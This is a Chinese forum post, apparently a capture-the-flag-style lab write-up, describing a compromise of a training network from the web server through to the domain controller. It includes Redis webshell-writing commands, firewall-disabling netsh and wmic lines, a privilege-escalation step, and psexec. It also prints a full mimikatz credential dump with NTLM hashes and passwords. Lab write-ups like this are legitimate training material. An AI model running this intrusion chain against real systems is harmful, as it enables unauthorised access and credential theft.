暗月6月出师靶机writeup

Delina · 发表于 2021-11-19 10:25:43

原文链接：暗月6月出师靶机writeup

大概环境长这个样子
由于nat环境问题所有192.168.59这个段不一致

由于没有师傅们的审计能力只能漏洞复现方式做了
扫描web.rar 导入sql分析发现这个是旧的已经没有用了

2 这个数据库备份的功能也被暗月砍掉了十分感谢暗月

3 师傅们给的另一招下载数据库备份文件
http://www.cocat.cc/kss_admin/admin_data.php
?action=mysqldatabak_down&pwd=安全密码
直接notepay++搜全局安全密码

下载备份数据库文件导入解密
登录后台怀疑就是暗月给砍掉了

这个地方闭合

路径默认配置文件

Db文件解密

宝塔默认端口8888
http://域名:8888/soft

然后解封函数即可

然后上frp映射端口

通过phpinfo查看网站的内网ip

现在的情况那就抓hash

等等上去关火绒

Frp将内网3389穿透出去关闭火绒

上马 hashdump 迁移进程梭哈

redis已经拿下通过爆破密码
然后通过把cmd 与redis-cli导入

坑点 1 写入php提示404 但是写入了
2 写入webshell要单引号
3 两个程序都需要导入代理 cmd与rediscli

config set dir/home/wwwroot/default/ #windows的web默认路径
config setdbfilename redis.php 文件名字
set webshell"<?php phpinfo(); ?>" #webshell
save
php可以双引号不知道为什么这个asp就得单引号了记录一下
第二个机器上图用redis打穿了通过代理蚁剑连接
然后配上甜土豆提权关闭防火墙

甜土豆坑点1 此版本的甜土豆如果提权需要加入绝对路径
例如 1.exe -a "c:/windows/*.exe"
然后加路由扫内网

本机ip 202

一共三个存活那就是201 开始测试
扫描ip端口
nmap -sV -sC -sT -Pn -p- 10.10.10.201 过程巨慢可以去打个lol什么的
nmap -sV -sC -sT -Pn -p- 10.10.10.209
201
然后出来了域控的机器还有域控的域名

209
开启了80 443
生成正向连接exe 坑点记得不要带空格

然后传入redis服务器的http页面

代理访问为outlook 邮箱翻exp去
坑点如果是乱码用*可以正则匹配一下下
获得邮箱moonsec@cncat.cc
test@cncat.cc

用那个outbook邮箱漏洞来打
这个 -i whoami 没什么用。。。直接就是交互式的命令执行
wmic RDTOGGLE WHEREServerName="%COMPUTERNAME%" call SetAllowTSConnections 1

关闭防火墙
下载我们刚刚给redis传的文件

然后执行命令

此处为migrate了一个低权限进程切记x64 system权限

Hashdump为本机的密码然后载入猕猴桃试试

然后就是佳哥教的抓密码了 msf自带以后没有猕猴桃了
Load kiwi
kiwi_cmd -f sekurlsa::logonPasswords
Authentication Id : 0 ; 20871772(00000000:013e7a5c)
Session          : NetworkCleartext from 0
User Name       : HealthMailbox3f7d5b8
Domain          : CNCAT
Logon Server    : 12SERVER-DC
Logon Time       : 2021/6/17 16:18:33
SID             :S-1-5-21-296591627-685496165-1408683996-1131
   msv:
      [00000003] Primary
      * Username : HealthMailbox3f7d5b8
      * Domain  : CNCAT
      * NTLM : 3fd9fdd66292ffe77e16137d5649ea17
      * SHA1 : 3acc7e64b7b354a1a8a51206bca488d514055b3a
   tspkg:
   wdigest:
      * Username : HealthMailbox3f7d5b8
      * Domain  : CNCAT
      * Password : (null)
   kerberos:
      * Username : HealthMailbox3f7d5b8
      * Domain  : CNCAT.CC
      * Password : (null)
   ssp:
   credman:
Authentication Id : 0 ; 20861945(00000000:013e53f9)
Session          : NetworkCleartext from 0
User Name       : HealthMailbox3f7d5b8
Domain          : CNCAT
Logon Server    : 12SERVER-DC
Logon Time       : 2021/6/17 16:18:22
SID             : S-1-5-21-296591627-685496165-1408683996-1131
   msv:
      [00000003] Primary
      * Username : HealthMailbox3f7d5b8
      * Domain  : CNCAT
      * NTLM : 3fd9fdd66292ffe77e16137d5649ea17
      * SHA1 : 3acc7e64b7b354a1a8a51206bca488d514055b3a
   tspkg:
   wdigest:
      * Username : HealthMailbox3f7d5b8
      * Domain  : CNCAT
      * Password : (null)
   kerberos:
      * Username : HealthMailbox3f7d5b8
      * Domain  : CNCAT.CC
      * Password : (null)
   ssp:
   credman:
Authentication Id : 0 ; 13728747(00000000:00d17beb)
Session          : Interactive from 1
User Name       : administrator
Domain          : CNCAT
Logon Server    : 12SERVER-DC
Logon Time       : 2021/4/28 23:45:24
SID             :S-1-5-21-296591627-685496165-1408683996-500
   msv:
      [00000003] Primary
      * Username : Administrator
      * Domain  : CNCAT
      * NTLM : 42e2656ec24331269f82160ff5962387
      * SHA1 : 202a4f252fa716b16cc934c114a2b4423add410d
      [00010000] CredentialKeys
      * NTLM : 42e2656ec24331269f82160ff5962387
      * SHA1 : 202a4f252fa716b16cc934c114a2b4423add410d
   tspkg:
   wdigest:
      * Username : Administrator
      * Domain  : CNCAT
      * Password : (null)
   kerberos:
      * Username : administrator
      * Domain  : CNCAT.CC
      * Password : (null)
   ssp:
   credman:
Authentication Id : 0 ; 86756(00000000:000152e4)
Session          : Interactive from 1
User Name       : DWM-1
Domain          : Window Manager
Logon Server    : (null)
Logon Time       : 2021/4/28 19:52:09
SID             : S-1-5-90-1
   msv:
      [00000003] Primary
      * Username : 12SERVER-EX13$
      * Domain  : CNCAT
      * NTLM : 7e0ebfdc16be2cf7652792713162d817
      * SHA1 : a413aeaf7935bab126af11ad8a1221651217e014
   tspkg:
   wdigest:
      * Username : 12SERVER-EX13$
      * Domain  : CNCAT
      * Password : (null)
   kerberos:
      * Username : 12SERVER-EX13$
      * Domain  : cncat.cc
      * Password : de 6b 04 cc 34 dc 30 d8 00 ec 9449 84 42 0b 33 7e ba 79 0e ac 56 99 64 ea 10 c8 95 95 55 a4 be 46 42 e6 5a 206e 58 f8 58 bc 35 56 6f ec ad 5a c6 b7 df 2f 1d dc 6c a0 c2 be ff 85 40 45 8d27 86 10 da 8b 48 8e c8 33 b2 23 9f 02 67 c4 06 61 33 1e f7 87 81 e4 0a bc 9158 63 b5 64 c5 27 53 1b a2 1e 1e 3c 4e bc e0 8b 1c 0c 03 60 08 bd 51 11 b6 7267 28 2c 9f e7 ee 1a fa bb 71 15 a6 a1 5d 2a 27 9f dd 11 22 b3 05 8e c3 03 8fc1 79 64 c0 d3 9f a4 93 c1 60 e7 4a 30 e4 fb c0 4b 43 da de 30 2c 9c 2e e8 93d1 1c 6b 3b eb a6 d7 a2 8e 51 f1 20 c9 50 95 e0 84 0d 64 f7 1b 73 11 0b fd bb0b 89 f1 e6 dc 8f e2 71 83 b0 16 42 f0 b7 29 3a c7 2e ae c8 5e c0 6e e8 96 dfa7 52 b8 f3 22 2d fd 9d 99 36 b3 d2 3e 7b e9 54 a5 ab 23 ce 4f
   ssp:
   credman:
Authentication Id : 0 ; 996(00000000:000003e4)
Session          : Service from 0
User Name       : 12SERVER-EX13$
Domain          : CNCAT
Logon Server    : (null)
Logon Time       : 2021/4/28 19:52:09
SID             : S-1-5-20
   msv:
      [00000003] Primary
      * Username : 12SERVER-EX13$
      * Domain  : CNCAT
      * NTLM : 7e0ebfdc16be2cf7652792713162d817
      * SHA1 : a413aeaf7935bab126af11ad8a1221651217e014
   tspkg:
   wdigest:
      * Username : 12SERVER-EX13$
      * Domain  : CNCAT
      * Password : (null)
   kerberos:
      * Username : 12server-ex13$
      * Domain  : CNCAT.CC
      * Password : (null)
   ssp:
   credman:
Authentication Id : 0 ; 20873779(00000000:013e8233)
Session          : NetworkCleartext from 0
User Name       : HealthMailbox3f7d5b8
Domain          : CNCAT
Logon Server    : 12SERVER-DC
Logon Time       : 2021/6/17 16:18:34
SID             :S-1-5-21-296591627-685496165-1408683996-1131
   msv:
      [00000003] Primary
      * Username : HealthMailbox3f7d5b8
      * Domain  : CNCAT
      * NTLM : 3fd9fdd66292ffe77e16137d5649ea17
      * SHA1 : 3acc7e64b7b354a1a8a51206bca488d514055b3a
   tspkg:
   wdigest:
      * Username : HealthMailbox3f7d5b8
      * Domain  : CNCAT
      * Password : (null)
   kerberos:
      * Username : HealthMailbox3f7d5b8
      * Domain  : CNCAT.CC
      * Password : (null)
   ssp:
   credman:
Authentication Id : 0 ; 995(00000000:000003e3)
Session       : Service from 0
User Name       : IUSR
Domain          : NT AUTHORITY
Logon Server    : (null)
Logon Time       : 2021/4/28 19:52:16
SID             : S-1-5-17
   msv:
   tspkg:
   wdigest:
      * Username : (null)
      * Domain  : (null)
      * Password : (null)
   kerberos:
   ssp:
   credman:
Authentication Id : 0 ; 997(00000000:000003e5)
Session          : Service from 0
User Name       : LOCAL SERVICE
Domain          : NT AUTHORITY
Logon Server    : (null)
Logon Time       :2021/4/28 19:52:09
SID             : S-1-5-19
   msv:
   tspkg:
   wdigest:
      * Username : (null)
      * Domain  : (null)
      * Password : (null)
   kerberos:
      * Username : (null)
      * Domain  : (null)
      * Password : (null)
   ssp:
   credman:
Authentication Id : 0 ; 52997(00000000:0000cf05)
Session          : UndefinedLogonType from 0
User Name       : (null)
Domain          : (null)
Logon Server    : (null)
Logon Time       : 2021/4/28 19:52:06
SID             :
   msv:
      [00000003] Primary
      * Username : 12SERVER-EX13$
      * Domain  : CNCAT
      * NTLM : 7e0ebfdc16be2cf7652792713162d817
      * SHA1 : a413aeaf7935bab126af11ad8a1221651217e014
   tspkg:
   wdigest:
   kerberos:
   ssp:
      [00000000]
      * Username : HealthMailbox3f7d5b8296944b708823d775f3d09aef@cncat.cc
      * Domain  : (null)
      * Password

9u-LyPp5[j.UeS!I!xb&dpQD5ynJi3*UE3gaMLrcB-UsErNKa+DX%5>@9)b@W.;Mww8ONUuWDxnRi1Q@CAaGCKID$5gY}#XRd%^@wXflBE+wUa==]zsJz%dG@7S+pVq
      [00000001]
      * Username : HealthMailbox3f7d5b8296944b708823d775f3d09aef@cncat.cc
      * Domain  : (null)
      * Password

9u-LyPp5[j.UeS!I!xb&dpQD5ynJi3*UE3gaMLrcB-UsErNKa+DX%5>@9)b@W.;Mww8ONUuWDxnRi1Q@CAaGCKID$5gY}#XRd%^@wXflBE+wUa==]zsJz%dG@7S+pVq
   credman:
Authentication Id : 0 ; 999(00000000:000003e7)
Session          : UndefinedLogonType from 0
User Name       : 12SERVER-EX13$
Domain          : CNCAT
Logon Server    : (null)
Logon Time       : 2021/4/28 19:52:06
SID             : S-1-5-18
   msv:
   tspkg:
   wdigest:
      * Username : 12SERVER-EX13$
      * Domain  : CNCAT
      * Password : (null)
   kerberos:
      * Username : 12server-ex13$
      * Domain  : CNCAT.CC
      * Password : (null)
   ssp:
   credman:
解密hash
QWEasd123
此时已经基本上ok了就差最后一台的的域控了

此时已经打穿三台了域控的密码也有了
此处大约卡了半个小时。。感谢佳哥的细心指导
Use windows/smb/psexec

初次设置弹不回来分析发现关闭防火墙即可弹回来但是不能手动去关啊。。
然后佳哥教导
windows/x64/exec
set cmd netsh firewall set opmode disable

此条命令为关闭域防火墙
用这个关闭所有的防火墙
NetSh Advfirewall set allprofiles state off

然后反向连接

完事大吉

		自动登录	找回密码
密码			立即注册